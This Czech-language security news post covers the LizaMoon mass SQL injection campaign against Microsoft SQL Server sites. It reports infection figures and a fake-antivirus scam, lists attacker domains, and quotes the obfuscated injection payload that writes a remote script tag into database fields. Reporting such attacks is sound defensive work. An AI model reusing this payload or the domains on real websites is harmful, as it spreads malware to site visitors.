LizaMoon SQL injection útok stále pokračuje, až 1.5 milionu nakažených stránek

SQL Injection útok pojmenovaný LizaMoon v Google indexu ukazuje už na 559 tisíc nalezených výsledků a TrendLabs upozorňuje na další rozšíření používaných domén.

LizaMoon, Etc. SQL Injection Attack Still Ongoing upozorňuje, že LizaMoon útočníci rozšířili počet domén, které používají pro spouštění útočného kódu. Útoky zatím stále pokračuje a pokud se podíváte na čísla v Google, tak od prvního dubna došlo k zdvojnásobení počtu zjištění nakažených adres. Podle GCN je nakaženo až 1.5 milionu webových stránek.

V ČR jsou viditelné tři nakažené weby – stavebnistandardy.cz, forum.mzh.cz a filatelie-stosek.cz, tady jeden nový od prvního dubna. Napadení počítačů návštěvníků těchto webů podle Trend Micro probíhá pomocí TROJ_FAKEAV.BBK a TROJ_WORID.A. Návštěvník napadené stránky je přesměrován na nabídku falešného antiviru (Windows Stability Center), který se klasickým podvodem snaží uživatele přesvědčit, že jeho počítač je zavirovaný a měl by si pořídit (falešný) antivir. Pokud uživatel nabízený falešný antivir nainstaluje, je ztracen.

Zdroj: Update on LizaMoon mass-injection and Q&A

Počet používaných domén pro útočný skript už jde do desítek

lizamoon.com/ur.php
tadygus.com/ur.php
alexblane.com/ur.php
alisa-carter.com/ur.php
online-stats201.info/ur.php
stats-master111.info/ur.php
agasi-story.info/ur.php
general-st.info/ur.php
extra-service.info/ur.php
t6ryt56.info/ur.php
sol-stats.info/ur.php
google-stats49.info/ur.php
google-stats45.info/ur.php
google-stats50.info/ur.php
stats-master88.info/ur.php
eva-marine.info/ur.php
stats-master99.info/ur.php
worid-of-books.com/ur.php
google-server43.info/ur.php
tzv-stats.info/ur.php
milapop.com/ur.php
pop-stats.info/ur.php
star-stats.info/ur.php
multi-stats.info/ur.php
google-stats44.info/ur.php
books-loader.info/ur.php
google-stats73.info/ur.php
google-stats47.info/ur.php
google-stats50.info/ur.php

WebSense (odkud je také předchozí seznam používaných domén) nabízí i pohled na kód používaný pro SQL Injection, další detaily nabízí Attack on ASP site that uses a SQL server database na StackOverflow.com

+update+Table+set+FieldName=REPLACE(cast(FieldName+as+varchar(8000)),cast(char(60)%2Bchar(47)
%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)
%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)
%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)
%2Bchar(47)%2Bchar(103)%2Bchar(111)%2Bchar(111)%2Bchar(103)%2Bchar(108)%2Bchar(101)%2Bchar(45)
%2Bchar(115)%2Bchar(116)%2Bchar(97)%2Bchar(116)%2Bchar(115)%2Bchar(53)%2Bchar(48)%2Bchar(46)
%2Bchar(105)%2Bchar(110)%2Bchar(102)%2Bchar(111)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(46)
%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)
%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)

+as+varchar(8)))–

Prozatím není jasné jak je SQL Injection využíváno – známé je, že se týká pouze webů používajících Microsoft SQL Server. A také, že nejde o chybu v MSSQL – je využívána chyba v nějakém jiném software, které tyto weby používají.